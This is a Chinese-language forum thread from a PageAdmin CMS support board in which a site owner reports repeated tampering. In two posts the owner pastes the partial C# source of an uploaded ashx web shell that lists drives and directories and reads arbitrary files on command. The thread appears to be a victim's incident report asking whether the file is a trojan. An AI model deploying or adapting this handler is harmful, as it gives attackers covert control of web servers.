PageAdmin V3.0最新补丁发布[紧急]（更新时间：2018-12-4） - 系统发布及下载-PageAdmin论坛

我的中心

PageAdmin网站内容管理系统(CMS)交流论坛 » PageAdmin使用区 » 系统发布及下载 » PageAdmin V3.0最新补丁发布[紧急]（更新时间：2018-12-4）

返回列表

发新话题

回复该主题

查看: 43005\|回复: 41	PageAdmin V3.0最新补丁发布[紧急]（更新时间：2018-12-4） [复制链接]

发送短消息 UID 2685 精华 0 查看公共资料搜索主题搜索帖子 e0398 组别PageAdmin熟手生日帖子283 积分503 性别注册时间2009-07-23	1^# 字体大小: t T 发表于 2018-11-30 22:52 \|显示全部最新补丁打上后网站频繁被修改主页或者删除主页文件。
	本主题由管理员 xiyou 于 2020/8/11 12:07:28 执行批量删帖操作分享转发

	TOP

发送短消息 UID 2685 精华 0 查看公共资料搜索主题搜索帖子 e0398 组别PageAdmin熟手生日帖子283 积分503 性别注册时间2009-07-23	2^# 字体大小: t T 发表于 2018-12-01 16:29 \|显示全部 .ashx 文件是否要全部删除你？


	TOP

发送短消息 UID 2685 精华 0 查看公共资料搜索主题搜索帖子 e0398 组别PageAdmin熟手生日帖子283 积分503 性别注册时间2009-07-23	3^# 字体大小: t T 发表于 2018-12-06 09:59 \|显示全部总是被上传 ashx.ashx 以及 ashx_?.ashx 的文件。文件的代码如下： “ <%@ WebHandler Language="C#" Class="Handler" %> using System; using System.Web; using System.IO; using System.Net; using System.Text; using System.Data; using System.Data.SqlClient; using System.Diagnostics; public class Handler : IHttpHandler { public void ProcessRequest(HttpContext context) { String Z = context.Request.Form["@"];// if (Z != "") { String Z1 = context.Request.Form["Z1"]; String Z2 = context.Request.Form["Z2"]; String R = ""; try { switch (Z) { case "A": { String[] c = Directory.GetLogicalDrives(); R = String.Format("{0}\t", context.Server.MapPath("/")); for (int i = 0; i < c.Length; i++) R += c[i][0] + ":"; break; } case "B": { DirectoryInfo m = new DirectoryInfo(Z1); foreach (DirectoryInfo D in m.GetDirectories()) { R += String.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss")); } foreach (FileInfo D in m.GetFiles()) { R += String.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length); } break; } case "C": { StreamReader m = new StreamReader(Z1, Encoding.Default); R = m.ReadToEnd(); m.Close(); break; } case "D": { 其他代码省略... 复制代码 ”


	TOP

发送短消息 UID 2685 精华 0 查看公共资料搜索主题搜索帖子 e0398 组别PageAdmin熟手生日帖子283 积分503 性别注册时间2009-07-23	4^# 字体大小: t T 发表于 2018-12-06 10:25 \|显示全部回复 17楼xiyou的帖子总是被上传 ashx.ashx 以及 ashx_?.ashx 的文件。文件的代码如下： “ <%@ WebHandler Language="C#" Class="Handler" %> using System; using System.Web; using System.IO; using System.Net; using System.Text; using System.Data; using System.Data.SqlClient; using System.Diagnostics; public class Handler : IHttpHandler { public void ProcessRequest(HttpContext context) { String Z = context.Request.Form["@"];// if (Z != "") { String Z1 = context.Request.Form["Z1"]; String Z2 = context.Request.Form["Z2"]; String R = ""; try { switch (Z) { case "A": { String[] c = Directory.GetLogicalDrives(); R = String.Format("{0}\t", context.Server.MapPath("/")); for (int i = 0; i < c.Length; i++) R += c[i][0] + ":"; break; } case "B": { DirectoryInfo m = new DirectoryInfo(Z1); foreach (DirectoryInfo D in m.GetDirectories()) { R += String.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss")); } foreach (FileInfo D in m.GetFiles()) { R += String.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length); } break; } case "C": { StreamReader m = new StreamReader(Z1, Encoding.Default); R = m.ReadToEnd(); m.Close(); break; } case "D": { 其他代码省略... 复制代码 ”


	TOP

发送短消息 UID 2685 精华 0 查看公共资料搜索主题搜索帖子 e0398 组别PageAdmin熟手生日帖子283 积分503 性别注册时间2009-07-23	5^# 字体大小: t T 发表于 2018-12-06 11:05 \|显示全部回复 22楼xiyou的帖子好的，我逐一查询所有代码。 ashx.ashx 这样的文件是木马吧？


	TOP

上一主题| 下一主题

发新话题

回复该主题